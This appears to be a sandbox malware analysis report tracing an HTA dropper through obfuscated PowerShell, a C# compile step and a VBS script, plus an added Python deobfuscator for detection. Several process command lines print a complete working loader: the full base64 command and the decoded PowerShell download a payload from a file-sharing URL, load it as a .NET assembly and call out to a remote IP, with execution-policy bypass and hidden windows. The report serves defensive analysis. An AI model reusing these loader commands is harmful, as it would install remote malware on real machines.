2024-11-28 06:18:12 UTC | 307 | IN | Data Raw: 31 32 63 0d 0a 7b 22 76 61 6c 69 64 61 74 69 6f 6e 65 72 72 6f 72 73 22 3a 5b 7b 22 50 72 6f 70 65 72 74 79 4e 61 6d 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 22 2c 22 45 72 72 6f 72 43 6f 64 65 22 3a 22 54 72 61 6e 73 66 65 72 45 78 70 69 72 65 64 22 2c 22 45 72 72 6f 72 4d 65 73 73 61 67 65 22 3a 22 54 68 69 73 20 74 72 61 6e 73 66 65 72 20 69 73 20 65 78 70 69 72 65 64 22 7d 5d 2c 22 72 65 73 70 6f 6e 73 65 73 74 61 74 75 73 22 3a 22 54 72 61 6e 73 66 65 72 45 78 70 69 72 65 64 22 2c 22 65 72 72 6f 72 69 64 22 3a 22 34 35 32 30 61 66 34 37 2d 38 63 30 32 2d 34 30 32 34 2d 62 38 63 35 2d 63 32 31 34 30 34 65 34 62 39 65 30 22 2c 22 65 72 72 6f 72 6d 65 73 73 61 67 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 20 2d 2d 3e 20 5b 54 72 61 6e 73 66 65 72 45 78
                                                                            Data Ascii: 12c{"validationerrors":[{"PropertyName":"transferid","ErrorCode":"TransferExpired","ErrorMessage":"This transfer is expired"}],"responsestatus":"TransferExpired","errorid":"4520af47-8c02-4024-b8c5-c21404e4b9e0","errormessage":"transferid --> [TransferEx
2024-11-28 06:18:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0



                                                                            Target ID:0
                                                                            Start time:01:17:56
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:mshta.exe "C:\Users\user\Desktop\greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta"
                                                                            Imagebase:0xc90000
                                                                            File size:13'312 bytes
                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:01:17:57
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))"
                                                                            Imagebase:0xea0000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true
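
The command line of Target ID 1 above never contains `::` or a literal double quote: `[Char]58` and `[cHAr]0X3A` produce the colons, `[cHAr]0x22` and `[cHar]34` the quotes, and `+` glues the fragments together so that `[System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String("..."))` only exists after PowerShell evaluates the string. As an added example, not code from the report or from Joe Sandbox, the Python below resolves `[char]N` tokens, folds the concatenations, and then reports the indicators a detection rule would key on (FromBase64String, IEX, execution-policy bypass, hidden window, and known tokens whose casing is neither canonical, all-lower nor all-upper). The sample command is the one shown above with the base64 payload, which the page does not reproduce, replaced by the constructed placeholder PAYLOAD_B64_REDACTED; the list of canonical tokens is an assumption.

```python
import re

# The inner command line of Target ID 1 in this report. The base64 payload is not reproduced
# on the page, so it is replaced here by the constructed placeholder PAYLOAD_B64_REDACTED.
SAMPLE_CMD = (
    "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; "
    "IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'"
    "+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'PAYLOAD_B64_REDACTED'+[cHar]34+'))')))"
)

# [char]N in decimal or hex, any casing, optional whitespace inside the brackets.
CHAR_TOKEN = re.compile(r"\[\s*char\s*\]\s*(0x[0-9a-f]+|\d+)", re.I)
# Two single-quoted PowerShell literals joined by '+' ('' is an escaped quote inside a literal).
CONCAT = re.compile(r"'((?:[^']|'')*)'\s*\+\s*'((?:[^']|'')*)'")


def resolve_char_tokens(cmd: str) -> str:
    """Rewrite [Char]58 / [cHAr]0X3A as the single-quoted literal ':' and so on."""
    def repl(m):
        v = m.group(1)
        ch = chr(int(v, 16) if v.lower().startswith("0x") else int(v))
        return "'" + ch.replace("'", "''") + "'"
    return CHAR_TOKEN.sub(repl, cmd)


def fold_concat(cmd: str) -> str:
    """Merge 'a'+'b' into 'ab' repeatedly until no adjacent pair is left."""
    prev = None
    while prev != cmd:
        prev = cmd
        cmd = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmd)
    return cmd


def deobfuscate(cmd: str) -> str:
    """Static, evaluation-free view of what the string concatenation builds."""
    return fold_concat(resolve_char_tokens(cmd))


# Tokens a rule expects in canonical casing (assumed list; extend to taste).
CANONICAL = ["powershell.exe", "Bypass", "IEX", "Invoke-Expression", "FromBase64String", "GetString"]


def case_anomalies(cmd: str) -> list:
    """Occurrences of known tokens whose casing is neither canonical, all-lower nor all-upper."""
    found = set()
    for tok in CANONICAL:
        for m in re.finditer(r"\b" + re.escape(tok) + r"\b", cmd, re.I):
            if m.group(0) not in (tok, tok.lower(), tok.upper()):
                found.add(m.group(0))
    return sorted(found)


def indicators(cmd: str) -> dict:
    """Detection-relevant facts about the command, computed on the folded string."""
    folded = deobfuscate(cmd)
    low = folded.lower()
    return {
        "frombase64string": "frombase64string(" in low,
        "iex": re.search(r"\biex\b|invoke-expression", low) is not None,
        "exec_policy_bypass": re.search(r"-e\w*\s+bypass\b", low) is not None,
        "hidden_window": re.search(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", low) is not None,
        "case_anomalies": case_anomalies(cmd),   # casing is judged on the raw command line
        "deobfuscated": folded,
    }


if __name__ == "__main__":
    for key, value in indicators(SAMPLE_CMD).items():
        print(f"{key}: {value}")
```

Folding is done on the command string alone and nothing is executed, so the result is safe to compute in a triage pipeline; the casing check runs on the raw line because the folded form would hide the `IeX`/`IEx` variation that the report's "PowerShell case anomaly" signature is about.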

                                                                            Target ID:2
                                                                            Start time:01:17:57
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:01:17:58
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE
                                                                            Imagebase:0xea0000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:01:18:02
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline"
                                                                            Imagebase:0x720000
                                                                            File size:2'141'552 bytes
                                                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:01:18:02
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2022.tmp" "c:\Users\user\AppData\Local\Temp\w0uathue\CSC6F7F1D769E649D6AA11CFF4BFABFB3.TMP"
                                                                            Imagebase:0xc60000
                                                                            File size:46'832 bytes
                                                                            MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:01:18:07
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs"
                                                                            Imagebase:0xbe0000
                                                                            File size:147'456 bytes
                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:01:18:08
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                            Imagebase:0xea0000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:01:18:08
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:9
                                                                            Start time:01:18:08
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
                                                                            Imagebase:0xea0000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1669867987.0000000006170000.00000010.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_6170000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction ID: 6e9a81d203edc7160c9e5af9f571a5b06817666eec6cfe8a044cf859e9120a82
                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction Fuzzy Hash:
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1823091409.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7500000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q
                                                                              • API String ID: 0-309238000
                                                                              • Opcode ID: 29fd455957d6211794d3c009d4a70cd7ab3a77cfd1d1ab870667d16e7fc192d2
                                                                              • Instruction ID: 85f7f0601f4962e2ad56fe2c6fa0ed3c62b23cbda429644c5279408d870faddb
                                                                              • Opcode Fuzzy Hash: 29fd455957d6211794d3c009d4a70cd7ab3a77cfd1d1ab870667d16e7fc192d2
                                                                              • Instruction Fuzzy Hash: E7F1E7B4B00609DFCB149F68D815AAEBBE2FBC9710F24846AE8059F391DA31DC45C7D2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1823091409.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7500000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q
                                                                              • API String ID: 0-309238000
                                                                              • Opcode ID: ff192bb6a57385942d534fb1146bc4e599761ceca2170e4c455a2d38d559c890
                                                                              • Instruction ID: 5083c7a146be7cf7756c3fab6731a375f7bf996f8124bcf2b026cb60a94c4c8f
                                                                              • Opcode Fuzzy Hash: ff192bb6a57385942d534fb1146bc4e599761ceca2170e4c455a2d38d559c890
                                                                              • Instruction Fuzzy Hash: 6C5145B1B00254AFCB249B689814BAABFE6BBC9710F14885BE549DF3C1CA71DC45C7E1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1823091409.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7500000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q
                                                                              • API String ID: 0-2862610199
                                                                              • Opcode ID: b1cd053a70691aa94b11579af1d9262a997060470579b487e9bbc316678693b3
                                                                              • Instruction ID: 8add4250411b34a9ec66194d8f41f8eda6d943bf0adcad99de61796d10325b21
                                                                              • Opcode Fuzzy Hash: b1cd053a70691aa94b11579af1d9262a997060470579b487e9bbc316678693b3
                                                                              • Instruction Fuzzy Hash: F8A1E4B0A0060ADFCB18CF68D455AADBBE2BB85710F18859AE8159F3D1DB31DC45CBD2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1823091409.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7500000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q
                                                                              • API String ID: 0-2862610199
                                                                              • Opcode ID: c8bad9a2889e447cd18164de69b9f00ccccfd0a84e2144ed3c165a2dd43ebbc3
                                                                              • Instruction ID: 07cee52e1caa981cf49b60beb2f1a66ed2464ce7ad057c553019489412cc90ed
                                                                              • Opcode Fuzzy Hash: c8bad9a2889e447cd18164de69b9f00ccccfd0a84e2144ed3c165a2dd43ebbc3
                                                                              • Instruction Fuzzy Hash: 519192B0A00609DBCB14CF58D555BAEBBF2BB88710F28845AE9159F391DB31DC45CBD2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1823091409.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7500000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9823bdc23268e2bb278fe10384845b49a3f0c007dc538327e33e38df1a73699f
                                                                              • Instruction ID: b1beb25bc3ba6e3a0e514674051dd432db134081c81ff93a70722fd30928befd
                                                                              • Opcode Fuzzy Hash: 9823bdc23268e2bb278fe10384845b49a3f0c007dc538327e33e38df1a73699f
                                                                              • Instruction Fuzzy Hash: C70147B570035437D624967A9C11BAB6B87BBC5724FA0C41BF54CDF3D1DAA1ED8043A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1823091409.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7500000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-2049395529
                                                                              • Opcode ID: 2d20f830f1ce2f23ce73b5c93c86a78a47d0d9bf91fff9abd92039a228417777
                                                                              • Instruction ID: b75ef17f740c9c1e3c57d9b03d129e7af3368985a2ed1e70523a7305b1f53c58
                                                                              • Instruction Fuzzy Hash: 7EE0D8B1B493499EDF1A7668B5503ACBBA17F83610F1044BEC48287195CB21C9688752
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1819751361.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: afa886eb9242fbfad396fa465ee21d4fca292e5d7d75b03938af47da11866aa4
                                                                              • Instruction ID: f878569d9d6e5e4ce3df93e2a2c773451de36c6ecac4af08037618703fc0c5e4
                                                                              • Opcode Fuzzy Hash: afa886eb9242fbfad396fa465ee21d4fca292e5d7d75b03938af47da11866aa4
                                                                              • Instruction Fuzzy Hash: 1C326F34A05258AFCF05CFA8D584A9DBBF1BF49314F15859AE444AB3A2C734EC85CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1819751361.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 887c8952ee938db6fbca37eff1836904d5469b0cd412442c4a3f6f6e8a44ece1
                                                                              • Instruction ID: e6de17408caca92d7a10750af885d3210914f9391e12efeb0a22aadc63c596dd
                                                                              • Opcode Fuzzy Hash: 887c8952ee938db6fbca37eff1836904d5469b0cd412442c4a3f6f6e8a44ece1
                                                                              • Instruction Fuzzy Hash: FFD10774A11209EFCB15CFA8D584A9DFBF2BF48314F248569E804AB3A5C735ED85CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3dbab3fb5f4345f9e4c4accfdeb9c7a3344698d33890b815fc6d59d262ebdba7
                                                                              • Instruction ID: 9b2ae7490828622db4014408e01d05d3f51f71df4957fa5026ade2e3853be69f
                                                                              • Opcode Fuzzy Hash: 3dbab3fb5f4345f9e4c4accfdeb9c7a3344698d33890b815fc6d59d262ebdba7
                                                                              • Instruction Fuzzy Hash: 4841C7F1A40315FFCF308A248901A6AFBA2BB95324F5580B6D444DF256DA31ED85CBE1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1819751361.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9f248105ed8bdabc238cb79a475a90b4d4b8ef1266fc8045d1e0c00abc7d772a
                                                                              • Instruction ID: 33a1420521c8bf5ff9e0c740539c380585f9f03090c3ac40fb0ddbb34bae1d89
                                                                              • Opcode Fuzzy Hash: 9f248105ed8bdabc238cb79a475a90b4d4b8ef1266fc8045d1e0c00abc7d772a
                                                                              • Instruction Fuzzy Hash: 2951BA74A00209AFCB54CFA8D584A9DFBF6BF88314F24D559E804AB3A5C735EC85CB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1819751361.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ae71f10f5ee325cc0c0ad094ec7900b18aaa37b7c28842871a640bf8732e044b
                                                                              • Instruction ID: aa5414eeb698ff60b845557ea50158bcff0dd74c75be6e174dff70bbad4a5a28
                                                                              • Opcode Fuzzy Hash: ae71f10f5ee325cc0c0ad094ec7900b18aaa37b7c28842871a640bf8732e044b
                                                                              • Instruction Fuzzy Hash: EE11E7B4A0020A9FCB00DF98D5809AAFBF5FB89310B148569E919AB351C731FC41CBA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1819751361.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 896628c9b7a58ee7dc5dcef074597aa9ce43218845c21fa74775a72ea90fd4d4
                                                                              • Instruction ID: aa13ddebe3df386e15c25c0d0b9e192454cd5016cb1c0ae46d03063e832e170a
                                                                              • Opcode Fuzzy Hash: 896628c9b7a58ee7dc5dcef074597aa9ce43218845c21fa74775a72ea90fd4d4
                                                                              • Instruction Fuzzy Hash: B111E934A04219EFCB44CBA8D584E9DFBF1AF48304F24C559E805AB3A5C775EC85CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1818959887.00000000035CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_35cd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
